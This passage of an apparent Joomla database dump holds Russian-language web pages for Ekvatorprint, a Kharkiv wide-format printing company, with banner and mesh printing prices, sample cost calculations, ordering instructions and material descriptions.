href=\"printing-on-the-grid\">печать на сетке баннерной</a> - полупрозрачная реклама на транспорте ил изданиях<br />- <a title=\"печать фотообоев\" href=\"print-photo\">печать фотообоев</a> - сделайте свой дом согласно своему вкусу<br />- <a href=\"plotternaya-podrezka\">плоттерная порезка пленки</a>&nbsp;- высокоточная порезка печати на пленксамоклеющейся пленки по контуру<br />- <a title=\"широкоформатная печать ситилайтов\" href=\"print-citylights\">печать сити лайтов</a>, современная эффективная наружная реклама<br />- <a title=\"печать больших фотографий\" href=\"print-great-photos\">печать больших фотографий </a>- для выставок, для интерьера</td>\r\n		</tr>\r\n	</tbody>\r\n</table>','',1,8,'2010-12-01 19:56:58',62,'','2022-01-25 11:53:12',62,0,'0000-00-00 00:00:00','2010-12-01 19:56:58','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',317,24,'печать на самоклейке, печать на оракале, печать на самоклеющейся пленке, печать на виниле, печать наклеек','Доставка по Украине с Харькова.  Печать наклеек на  самоклеющейся пленке. Для рекламы и интерьера. Яркие цвета, не выгорают на улице. ',1,167002,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(8,42,'Баннер печать','2010-12-01-20-03-24','<h1 style=\"text-align: center;\"><span style=\"font-size: 100%;\">Печать на баннере</span></h1>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #0000ff;\"><strong><span style=\"font-size: 200%;\">Цена печати баннера:</span></strong>\r\n	</span>\r\n</p>\r\n<table style=\"width: 738px; height: 186px; margin: 10px;\" border=\"1\" cellspacing=\"2\" cellpadding=\"2\">\r\n	<tbody style=\"padding-left: 30px;\">\r\n		<tr style=\"text-align: center; height: 40px; padding-left: 30px; background-color: #172983;\">\r\n			<td style=\"padding-left: 30px;\" rowspan=\"2\" width=\"309\" height=\"60\"><strong><span style=\"color: #ffec00;\"><span style=\"font-size: 155%;\">Материал</span></span> </strong></td>\r\n			<td rowspan=\"2\" width=\"171\"><strong><span style=\"color: #ffec00; font-size: 110%;\">Ширина рулона</span></strong></td>\r\n			<td width=\"128\"><strong><span style=\"color: #ffec00;\"><span style=\"font-size: 155%;\">Стоимость</span><br />(грн./м<sup>2</sup>)</span> </strong></td>\r\n		</tr>\r\n		<tr style=\"background-color: #172983; height: 20px; text-align: center;\">\r\n			<td width=\"64\"><strong><span style=\"color: #ffec00;\">от 5м<sup>2</sup></span></strong></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"text-align: left; padding-left: 10px;\" width=\"309\" height=\"40\"><span style=\"font-size: 160%;\">Баннер ламинированный</span> <span style=\"font-size: 100%;\"> прочный </span></td>\r\n			<td width=\"171\"><span style=\"font-size: 100%;\">3.10/2.05/1.55/1.05</span></td>\r\n			<td width=\"64\"><span style=\"font-size: 170%;\">68</span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"text-align: left;\" width=\"309\" height=\"20\"><span style=\"font-size: 160%; padding-left: 10px;\">Баннер литой</span></td>\r\n			<td width=\"171\"><span style=\"font-size: 100%;\">3.10/2.05/1.55</span></td>\r\n			<td width=\"64\"><span style=\"font-size: 170%;\">92</span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"text-align: left;\" width=\"309\" height=\"20\"><span style=\"font-size: 160%; padding-left: 10px;\">Баннер литой</span></td>\r\n			<td width=\"171\"><span style=\"font-size: 100%;\">1.05</span></td>\r\n			<td width=\"64\"><span style=\"font-size: 170%;\">78</span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"text-align: left;\" width=\"309\" height=\"20\"><span style=\"font-size: 160%; padding-left: 10px;\">Сетка баннерная</span></td>\r\n			<td width=\"171\"><span style=\"font-size: 100%;\">3.10</span></td>\r\n			<td width=\"64\"><span style=\"font-size: 170%;\">95</span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"text-align: left;\" width=\"309\" height=\"20\"><span style=\"font-size: 130%; padding-left: 10px;\">Установка люверсов</span></td>\r\n			<td width=\"171\"><span style=\"font-size: 100%;\">грн/шт</span></td>\r\n			<td width=\"64\"><span style=\"font-size: 170%;\">2</span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"text-align: left;\" width=\"309\" height=\"20\"><span style=\"font-size: 130%; padding-left: 10px;\">Обрезка по контуру</span></td>\r\n			<td width=\"171\"><span style=\"font-size: 100%;\">грн/м.пог.</span></td>\r\n			<td width=\"64\"><span style=\"font-size: 170%;\">2</span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"text-align: left;\" width=\"309\" height=\"20\"><span style=\"font-size: 130%; padding-left: 10px;\">Проклейка подворота</span></td>\r\n			<td width=\"171\"><span style=\"font-size: 100%;\">грн/м.пог.</span></td>\r\n			<td width=\"64\"><span style=\"font-size: 170%;\">12</span></td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<p style=\"text-align: right; font-size: 135%; margin: 10px;\">срок наружного применения не менее трех лет</p>\r\n<p style=\"margin: 10px; font-size: 120%; text-align: justify;\">Пример просчета стоимости заказа можно посмотреть по ссылке <a style=\"font size: 130%;\" href=\"#proschet\">НИЖЕ НА СТРАНИЦЕ</a></p>\r\n<div style=\"margin: 10px;\">\r\n	<h2><span style=\"color: #0000ff;\"><strong><span style=\"font-size: 120%;\">Как заказать печать баннера:</span></strong>\r\n		</span>\r\n	</h2>\r\n	<p style=\"text-align: justify;\"><span style=\"font-size: 200%; background-color: #ff9900;\">Заказать баннер можно по <strong>e-mail</strong>.</span></p>\r\n	<p><span style=\"text-align: left; font-size: 160%;\">Для оформления заказа присылайте Ваш макет на электронную почту:</span><br /> <span style=\"text-align: left; font-size: 200%; background-color: #ff9900;\"><strong> e@ekvatorprint.com.ua</strong></span>&nbsp;</p>\r\n</div>\r\n<p>&nbsp;</p>\r\n<div style=\"margin: 10px;\">\r\n	<p style=\"text-align: justify;\"><span style=\"font-size: 120%;\">Для оперативного оформления заказа файлы необходимо подписывать в следующем порядке: количество штук, материал, размеры изделия, дополнительные услуги:</span></p>\r\n	<p style=\"font-size: 13pt; color: black;\"><img src=\"images/bannermaket3.png\" alt=\"Как правильно подписывать макет баннера\" /></p>\r\n	<p style=\"font-size: 120%;\">По умолчанию просчитывается ламинированый баннер. Если Вам необходим литой баннер, обязательно указывайте это в названии макета!</p>\r\n	<p>Более детальную инструкцию по подготовке макета можно посмотреть в разделе <a href=\"trebovaniya\">Требования к макетам.</a></p>\r\n	<h3><span style=\"font-size: 90%;\">Наши работы (интерьерная печать и для наружного применения):</span>\r\n		<p><img style=\"border: 2px solid #000099;\" src=\"images/portfolio/Bannera/banner18.jpg\" alt=\"Печать баннера для баскетбольного зала в Киеве\" width=\"258\" height=\"145\" /><img style=\"border: 2px solid #000099;\" src=\"images/portfolio/Bannera/Banner-1.jpg\" alt=\"Изготовление ламинированного баннера на фасад салона керамической плитки Kerama Marazzi\" width=\"220\" height=\"146\" /><img style=\"border: 2px solid #000099;\" src=\"images/portfolio/Bannera/Banner-2.jpg\" alt=\"Баннер для бигборда с рекламой салона свадебных платьев Гламур\" width=\"219\" height=\"145\" /><img style=\"border: 2px solid #000099;\" src=\"images/portfolio/Bannera/Banner-3.jpg\" alt=\"Баннерная растяжка на фасаде клуба Royal\" width=\"231\" height=\"154\" /><img style=\"border: 2px solid #000099;\" src=\"images/portfolio/Bannera/Banner-4.jpg\" alt=\"Яркая баннерная реклама натяжных потолков Labell\" width=\"232\" height=\"154\" /><img style=\"border: 2px solid #000099;\" src=\"images/portfolio/Bannera/Banner-7.jpg\" alt=\"Печать баннера для клуба Belinski Hall в  Харькове\" width=\"234\" height=\"154\" /><img style=\"border: 2px solid #000099;\" src=\"images/portfolio/Bannera/Banner-5.jpg\" alt=\"Баннерная ткань длинной 60м рядом с центральным автовокзалом Харькова\" width=\"414\" height=\"203\" /><img style=\"border: 2px solid #000099;\" src=\"images/portfolio/Bannera/Banner-10.jpg\" alt=\"Пример отличного варианта обшивки баннером рекламных стоек баскетбольного матча Украина-Легион\" width=\"285\" height=\"203\" /><img style=\"border: 2px solid #000099;\" src=\"images/portfolio/Bannera/Banner-13.jpg\" alt=\"Пример использования баннера в ТРЦ Французский бульвар\" width=\"237\" height=\"157\" /><img style=\"border: 2px solid #000099;\" src=\"images/portfolio/Bannera/banner16.jpg\" alt=\"Применение баннерного полотна в рекламе фирменного СТО ХАДО\" width=\"224\" height=\"157\" /><img style=\"border: 2px solid #000066;\" src=\"images/portfolio/Bannera/Banner-11.jpg\" alt=\"Фотозона мероприятия в ТРЦ Французский Бульвар\" width=\"237\" height=\"157\" /></p>\r\n		<p style=\"text-align: left;\">&nbsp;</p>\r\n	</h3>\r\n	<h4 style=\"font-size: 190%; color: #0000ff;\">Почему стоит разместить заказ у нас:</h4>\r\n	<p style=\"font-size: 130%; text-align: justify; margin-right: 1.5em;\"><span style=\"font-size: 120%; background-color: yellow;\"><strong><em>Длительный срок наружного применения.</em></strong></span> Изображения будут оставаться очень длительное время яркими и насыщенными под воздействиями погодных условий окружающей среды и ультрафиолетовых лучей. Изделие прослужит Вам не один сезон и сохранит множество средств, ведь Вам не прийдется часто нести затраты на замену и дополнительный монтаж рекламы по причине ее выцветания.</p>\r\n	<p style=\"font-size: 130%; text-align: justify; margin-left: 1.5em;\"><span style=\"font-size: 120%; background-color: yellow;\"><strong><em>Выгодная цена.</em></strong></span> Использование передового современного оборудования позволяет нам изготавливать заказы по невысокой цене, при стабильно высоком качестве. Мы делаем все возможное, чтоб Вам было выгодно сотрудничать с нами.</p>\r\n	<p style=\"font-size: 130%; text-align: justify; margin-right: 1.5em;\"><span style=\"font-size: 120%; background-color: yellow;\"><strong><em>Отсутствие сильного токсичного запаха.</em></strong></span> Если Вам необходима печать фотозон, прес-воллов или брэнд-воллов, и изделие будет находиться внутри помещения, Вы можете быть уверены, что при заказе у нас, изделие будет без сильного запаха чернил, и оставит только положительные впечатления о празднике или мероприятии.</p>\r\n	<p style=\"font-size: 130%; text-align: justify; margin-left: 1.5em;\"><span style=\"font-size: 120%; background-color: yellow;\"><strong><em>Правильная цветопередача и широкий цветовой охват.</em></strong></span> Для изготовления мы используем качественные материалы, проверенные временем, а также фирменные оригинальные чернила.</p>\r\n	<p style=\"font-size: 130%; text-align: justify; margin-right: 1.5em;\" id=\"proschet\"><span style=\"font-size: 120%; background-color: yellow;\"><strong><em>Короткие сроки изготовления заказа.</em></strong></span> Средний срок изготовления составляет до двух рабочих дней.</p>\r\n</div>\r\n<div style=\"margin: 10px;\">&nbsp;</div>\r\n<div style=\"margin: 15px;\">\r\n	<p style=\"font-size: 190%; color: #0000ff;\">Пример просчетов стоимости заказа</p>\r\n	<p style=\"font-size: 130%; text-align: justify;\">Стоимость заказа состоит из стоимости площади печати и дополнительных (постпечатных) услуг. При просчете площади печати учитывается ширина рулона, на которую располагается макет. К постпечатным услугам относятся обрезка баннера по периметру, установка люверсов, проклейка подворотов или проклейка кармана под трубу. Ниже пример как просчитать цену.</p>\r\n	<p><span style=\"font-size: 140%; background-color: #fffddf;\"><em>Баннер ламинированный_90х600см</em></span><br /> 1.05м х 6м х 68грн/м2 = 428грн.</p>\r\n	<p><span style=\"font-size: 140%; background-color: #fffddf;\"><em>Баннер ламинированный_200х250см_люверсы 30см по периметру</em></span> <br />Стоимость печати = 2,05м х 2,5м х 68грн/м2 = 349грн <br /> Стоимость обрезки по периметру = (2м + 2,5м) х 2 х 2грн/м.пог. = 18грн <br /> Стоимость установки люверсов = (2м + 2,5м) х 2 / 0,3 х 2грн/люверс = 60грн <br /> Общая стоимость заказа = 349 + 18 + 60 = 427грн.</p>\r\n	<p><span style=\"font-size: 140%; background-color: #fffddf;\"><em>Баннер литой_190х600см_подворот_люверсы 30см по периметру</em></span><br />Стоимость печати = 2,05м х 6м х 92грн/м2 = 1131грн <br /> Стоимость подворота края с проклейкой = (2м + 6м) х 2 х 12грн/м.пог. = 192грн <br /> Стоимость установки люверсов = (2м + 6м) х 2 / 0,3 х 2грн/люверс = 103грн <br /> Общая стоимость заказа = 1131 + 192 + 103 = 1426грн.</p>\r\n	<p>&nbsp;</p>\r\n	<h3 style=\"text-align: justify;\"><span style=\"color: #333399;\">Про изготовление баннеров</span></h3>\r\n	<h3><span style=\"font-size: 100%; color: #000080;\">Материал бывает нескольких видов:</span></h3>\r\n	<p style=\"text-align: justify;\"><span style=\"font-size: 170%; text-align: justify;\"><img src=\"images/Play-icon.png\" alt=\"Play icon\" width=\"25\" height=\"25\" />&nbsp;Баннер ламинированый.</span>&nbsp;<span style=\"font-size: 140%;\">Материал представляет собой армирующую ткань, покрытую слоем ПВХ с обеих сторон. Мы используем&nbsp;прочную ткань, наш ламинированый баннер&nbsp;&nbsp;является самым экономически выгодным вариантом наружной рекламы. Его очень удобно смонтировать практически на любую поверхность.&nbsp;</span></p>\r\n	<p style=\"text-align: justify;\"><img style=\"text-align: justify; font-size: 18.6667px;\" src=\"images/Play-icon.png\" alt=\"Play icon\" width=\"25\" height=\"25\" />&nbsp;<span style=\"font-size: 170%;\">Баннер литой. </span><span style=\"font-size: 140%;\">Армирующая ткань в литом баннере плотнее, чем в ламинированом. За счет своей структуры его удобно склеивать&nbsp;друг с другом, поэтому его рекоммендуют применять&nbsp;для изделий крупных размеров, состоящих из нескольких частей (к примеру для печати постеров размером 8мх15м).&nbsp;<em>Если же печать на баннере можно осуществить цельным куском без склейки и не сильно больших размеров, мы рекомендуем применять ламинированую баннерную ткань.</em></span></p>\r\n	<p style=\"text-align: justify;\"><img style=\"text-align: justify; font-size: 18.6667px;\" src=\"images/Play-icon.png\" alt=\"Play icon\" width=\"25\" height=\"25\" />&nbsp;<span style=\"font-size: 170%;\">Сетка баннерная.</span><span style=\"font-size: 140%;\"> Используется в наружной рекламе особо крупных размеров. Благодаря перфорации ее вес значительно меньше обычного баннера, она хорошо пропускает ветер, не создавая \"парусности\", а также хорошо пропускает свет. <em>Печать постеров сверхбольших размеров</em> (к примеру 20х30м) рекомендуется осуществлять на сетке баннерной.&nbsp;</span></p>\r\n	<h4>&nbsp;<span style=\"color: #0000ff; font-size: 130%;\">Как усилить люверсы в баннере:</span></h4>\r\n	<p style=\"text-align: justify;\"><span style=\"text-align: justify; font-size: 140%;\">&nbsp; &nbsp;Наиболее эффективным способом усиления люверсов является подворот края с проклейкой. Люверс устанавливается между краем баннера и проклейкой подворота, что делает его гораздо более устойчивым к ветровым нагрузкам. Подворот без проклейки является малоэффективным для усиления люверсов. Если Вы уверены что на люверсы в баннере будет воздействовать повышенная нагрузка, можно дополнительно <strong>заказать подворот баннера с проклейкой, </strong>если повышенной нагрузки на люверс не будет, мы не рекоммендуем заказывать подворот баннера с проклейкой.</span><span id=\"maketbannera\"></span></p>\r\n	<h5 style=\"margin: 10px; text-align: left; font-size: 190%; color: #0000ff;\"><span style=\"font-family: \'arial black\', sans-serif;\">Как подготовить несложный макет баннера для широкоформатной печати за 5 минут:</span></h5>\r\n	<p style=\"margin: 10px; font-size: 120%; text-align: justify;\">Если у Вас нет опыта в подготовке макета для печати, <strong>на видео ниже предлагаем посмотреть как в графическом онлайн редакторе на нашем сайте Вы сможете самостоятельно за 5 минут подготовить макет для заказа баннера</strong>: как задать размеры, создать фон в виде градиента, ввести надпись и добавить к ней тень и обводку, как бесплатно скачать картинку в интернете и вставить ее в макет.</p>\r\n	<div style=\"margin: 10px; width: 710px; height: 450px; position: relative; border: 1px solid #000; background: url(\'//img.youtube.com/vi/HNTekMgwxhI/maxresdefault.jpg\')  0% 0% / cover;\">\r\n		<script src=\"/media/youtube/play2.js\" type=\"text/javascript\"></script>\r\n		<div class=\"video1-play\" data-video=\"HNTekMgwxhI\" onclick=\"videoplay(this);\">&nbsp;</div>\r\n	</div>\r\n	<p>&nbsp;</p>\r\n</div>\r\n<div style=\"margin: 10px;\">\r\n	<p>&nbsp;</p>\r\n	<p style=\"text-align: justify;\">&nbsp;<img style=\"border: 1px solid grey; text-align: justify; float: left; margin: 5px;\" title=\"изготовление баннера\" src=\"images/stories/banner-big.jpg\" alt=\"изготовление баннера\" width=\"250\" border=\"0\" /><span style=\"color: #000000;\">&nbsp;<span style=\"font-size: 140%; text-align: justify;\"><a href=\"https://ru.wikipedia.org/wiki/Баннерная_ткань\">Печать на баннерной ткани</a> - это идеальный вариант привлечения клиентов и брендирования компании.&nbsp;</span></span>\r\n	</p>\r\n	<p style=\"text-align: justify;\"><span style=\"font-size: 140%;\">&nbsp;На сегодня баннера - это самый популярный вид наружной рекламы: он заметен за счет своих масштабов, воздействует на максимально большое количество аудитории, его монтаж не является сложным.</span></p>\r\n	<p style=\"text-align: justify;\"><span style=\"font-size: 140%;\">С другой стороны, невысокая стоимость изготовления баннера делает его <em>наиболее экономически эффективным</em>, поэтому печать баннеров городе Харьков очень популярным видом рекламы. Также очень востребована печать баннеров в Киеве, Одессе, Днепре, Сумах, и во всей Украине.</span></p>\r\n	<h1 style=\"text-align: center;\"><span style=\"color: #ff0000;\"></span></h1>\r\n</div>\r\n<p>&nbsp;</p>\r\n<div style=\"margin: 10px;\">\r\n	<h3 style=\"text-align: justify;\"><span style=\"color: #333399;\">Требования к макету баннера</span>&nbsp;</h3>\r\n	<p style=\"text-align: justify;\">Макет принимается в формате JPEG в натуральном размере. Разрешение файла должно быть от 20 до 70&nbsp;пикселей на дюйм.&nbsp;</p>\r\n	<p style=\"text-align: justify;\">Перед заказом баннера большого размера, можно заказать цветопробу.</p>\r\n	<p style=\"text-align: justify;\">&nbsp;</p>\r\n	<h3 style=\"text-align: justify;\"><span style=\"color: #333399;\">Размер рулонов баннера:</span></h3>\r\n	<p style=\"text-align: justify;\">Печать осуществляется на материале <span style=\"font-size: small;\">шириной <strong>1,05/1,55/2.05/3.10 метра</strong></span></p>\r\n	<p>&nbsp;</p>\r\n	<p>Креативная реклама с помощью баннера:</p>\r\n	<p>Печать под слоганом - \"Кока-кола в каждый дом\":<br /><img src=\"images/stories/kreativnaja-reklama/koka-kola-v-ofis.jpg\" alt=\"Печать баннеров для рекламы под слоганом - &quot;Кока-кола в каждый дом&quot;\" width=\"644\" height=\"322\" /><br />Печать на баннере сериала \"Закон и порядок\":<br /><img style=\"border: 0px none;\" src=\"images/stories/kreativnaja-reklama/pechat-na-bannere-serial.jpg\" alt=\" Печать на баннере сериала &quot;Закон и порядок&quot;\" width=\"643\" height=\"388\" /></p>\r\n	<table border=\"0\">\r\n		<tbody>\r\n			<tr style=\"text-align: center;\">\r\n				<td>Реклама \"Тренажерного зала\"</td>\r\n				<td>Рекламы Volkswagen - Хорошее должно быть небольшим.</td>\r\n			</tr>\r\n			<tr>\r\n				<td><img style=\"border: 0px none; margin-top: 5px; margin-bottom: 5px; float: left;\" src=\"images/stories/kreativnaja-reklama/pechat-na-bannere-sport.jpg\" alt=\"Реклама &quot;Тренажерного зала&quot; на баннере\" width=\"290\" height=\"383\" /></td>\r\n				<td><img style=\"margin-top: 5px; margin-bottom: 5px; border: 0px none; float: right;\" src=\"images/stories/kreativnaja-reklama/pechat-na-bannere-volkswage.jpg\" alt=\"баннер для рекламы Volkswagen - Хорошее должно быть небольшим.\" width=\"293\" height=\"390\" /></td>\r\n			</tr>\r\n		</tbody>\r\n	</table>\r\n</div>\r\n<div style=\"margin: 10px;\">\r\n	<p>&nbsp;</p>\r\n	<p>&nbsp;</p>\r\n	<p>Компания&nbsp;Экваторпринт осуществляет печать на баннере&nbsp;&nbsp;<strong>в Харькове</strong>.&nbsp;</p>\r\n	<p>Доставка осуществляется в Киев и&nbsp;<strong>во все города Украины.</strong></p>\r\n	<p>&nbsp;</p>\r\n	<p>&nbsp;<img style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" />\"ЭкваторПринт\" качественно и быстро выполнит:<br /><br />- <a title=\"печать на холсте\" href=\"printing-on-canvas\">печать на холсте</a> - украсьте оригинально свой интерьер<br /> - <a title=\"печать на виниле\" href=\"printing-on-vinyl\">печать на виниле (на пленке)</a> - современная яркая наружная реклама<br />- <a title=\"печать на сетке баннерной\" href=\"printing-on-the-grid\">печать на сетке баннерной</a> - для рекламы на транспорте и фасадах<br />- <a title=\"изготовление наружной   рекламы\" href=\"outdoor-advertising\">изготовление наружной рекламы</a> - разные виды реклама на улицах и магазинах<br />- <a title=\"печать   больших фотографий\" href=\"print-great-photos\">печать больших фотографий </a>- лучшему фото - достойный формат<br />- <a title=\"печать на фотообоях\" href=\"print-photo\">печать на фотообоях</a>&nbsp;-&nbsp;&nbsp;сделайте помещение ярким и оригинальным<br />- <a href=\"print-flags\">печать флагов</a> - логотипы вышей фирмы, подарочные флаги, рекламные флаги<br />- <a title=\"широкоформатная печать ситилайтов\" href=\"print-citylights\">ситилайты</a>&nbsp;-&nbsp;&nbsp;реклама нацеленная на наиболее качественный зрительный контакт с потенциальными клиентами<br /><br /><span style=\"color: #000000;\">Мы предоставляем качественные материалы, стойкие чернила, быстрые сроки, высокий сервис! \"ЭкваторПринт\" - лучший центр&nbsp; широкоформатной печати. Качество наших услуг останется на должном уровне долгий период времени.</span></p>\r\n</div>','',1,8,'2010-12-01 20:03:12',62,'','2022-01-25 12:00:49',62,62,'2022-01-26 12:05:58','2010-12-01 20:03:12','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',647,23,'печать на баннере Харьков, баннер печать, печать постеров','Доставка по Украине. Качественная печать баннеров для наружной рекламы и интерьера, фотозон для праздников Харьков. Без запаха, не выцветают.',1,210470,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(9,43,'Печать на сетке','2010-12-01-20-08-59','<table style=\"width: 705px;\" border=\"0\" align=\"center\">\r\n	<tbody>\r\n		<tr>\r\n			<td style=\"text-align: center; width: 705.5px;\" colspan=\"2\">\r\n				<h1><span style=\"font-size: 110%;\">Печать на сетке баннерной</span></h1>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"width: 695.5px;\">\r\n				<p>Компания Экваторпринт осуществляет печать <strong>в Харькове</strong>. <br />Доставка осуществляется <strong>во все города Украины</strong>.</p>\r\n				<p><span style=\"color: #0000ff;\"><span style=\"font-size: 140%;\"><strong>Цена печати:</strong></span></span>\r\n				</p>\r\n				<table style=\"width: 695px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n					<tbody>\r\n						<tr style=\"text-align: center; background-color: #172983; height: 40px;\">\r\n							<td rowspan=\"2\" width=\"309\" height=\"60\"><span style=\"color: #ffec00; font-size: 140%;\"><strong>Материал</strong></span></td>\r\n							<td rowspan=\"2\" width=\"171\"><span style=\"color: #ffec00; font-size: 110%;\"><strong>Ширина рулона</strong></span></td>\r\n							<td width=\"128\"><span style=\"color: #ffec00;\"><strong><span style=\"font-size: 140%;\">Стоимость</span><br />(грн./м2)</strong>\r\n								</span>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"background-color: #172983; height: 20px; text-align: center;\">\r\n							<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>от 5м<sup>2</sup></strong></span></span>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"text-align: center;\">\r\n							<td style=\"text-align: left;\" width=\"309\" height=\"40\"><span style=\"font-size: 150%;\">Сетка баннерная</span></td>\r\n							<td width=\"171\">3.15</td>\r\n							<td width=\"64\"><span style=\"font-size: 160%;\">95</span></td>\r\n						</tr>\r\n					</tbody>\r\n				</table>\r\n				<p>&nbsp;</p>\r\n				<p><span style=\"color: #0000ff; font-size: 140%;\"><strong>Заказать печать:</strong></span></p>\r\n				<p><span style=\"font-size: 130%;\">Принимаем заказы по <strong>e-mail:</strong> <span style=\"background-color: #ffff00;\">e@ekvatorprint.com.ua</span></span>\r\n				</p>\r\n				<p>&nbsp;</p>\r\n				<p><span style=\"font-size: 130%;\">Наши работы:</span></p>\r\n				<p><img style=\"border: 2px solid #000099;\" src=\"images/portfolio/Setki/Setka-1.jpg\" alt=\"Печать на сетке - отличный способ украсить фасад\" width=\"272\" height=\"167\" /><img style=\"border: 2px solid #000099;\" src=\"images/portfolio/Setki/Setka-4.jpg\" alt=\"Печать сетки банерной для баскетбольного матча Украина-Легион\" width=\"125\" height=\"167\" /><img style=\"border: 2px solid #000099;\" src=\"images/portfolio/Setki/Setka-5.jpg\" alt=\"Печать на сетке - внушающая реклама интернет-магазина на фасаде ДК ХЭМЗ в Харькове \" width=\"279\" height=\"166\" /></p>\r\n				<p>&nbsp;</p>\r\n				<hr />\r\n				<p>&nbsp;</p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"width: 705.5px; font-size: 110%;\" colspan=\"2\">\r\n				<p style=\"text-align: justify;\"><strong><img style=\"float: left; margin: 5px; border: 1px solid grey;\" title=\"сетка баннерная\" src=\"images/stories/setka-big.jpg\" alt=\"сетка баннерная\" border=\"0\" />Сетка баннерная</strong> - облегченный вариант наружной рекламы. Сетка баннерная характеризуется полупрозрачными свойствами, поэтому зачастую устанавливается на фасадах с окнами. Также, сетка баннерная отлично походит для изготовления декораций заднего плана для театров и сцен.</p>\r\n				<p style=\"text-align: justify;\">В городе <strong>Харьков сетка баннерная</strong> часто применяется для <a style=\"color: #000000;\" title=\"Изготовление наружной рекламы\" href=\"outdoor-advertising\">изготовления наружной рекламы</a>&nbsp;крупных размеров.</p>\r\n				<p style=\"text-align: justify;\">В \"ЭкваторПринт\" <strong>печать на сетке</strong> баннерной осуществляется на материале высокого качества шириной 3,15 м., длинной до 50м <span style=\"font-size: 100%;\">(цельным куском)</span></p>\r\n				<p style=\"text-align: justify;\">Размеры готового изделия не ограничены, т.к. части могут быть склеены друг с другом.</p>\r\n				<p style=\"text-align: center;\"><strong><span style=\"font-size: 150%; color: #ff0000;\">Заказав <a style=\"color: #ff0000;\" title=\"широкоформатная печать Харьков\" href=\"/\">широкоформатную печать</a> у нас, Вы получите качественную цветную печать, прочный материал и быстрые сроки выполнения заказа.</span></strong></p>\r\n			</td>\r\n		</tr>\r\n		<tr style=\"background-color: #6699cc;\">\r\n			<td style=\"height: 2px; width: 695.5px;\">&nbsp;</td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"width: 705.5px;\" colspan=\"2\"><img style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" />\"ЭкватрПринт\" предоставляет полный перечень услуг по широкоформатной печати:<br /><br />- <a title=\"печать на холсте\" href=\"printing-on-canvas\">печать на холсте</a> - стилизация под картину любого изображения<br /> - <a title=\"печать на виниле\" href=\"printing-on-vinyl\">печать на виниле (на пленке)</a> - яркие цвета и высокая устойчивость к воздействиям внешней среды<br />- <a title=\"изготовление баннера\" href=\"banner-printing\">изготовление баннера</a> - эффективная реклама большого формата<br />- <a title=\"печать больших фотографий\" href=\"print-great-photos\">печать больших фотографий </a>- достойному фото - заметный формат</td>\r\n		</tr>\r\n	</tbody>\r\n</table>','',1,8,'2010-12-01 20:08:35',62,'','2021-06-26 07:45:47',62,0,'0000-00-00 00:00:00','2010-12-01 20:08:35','0000-00-00 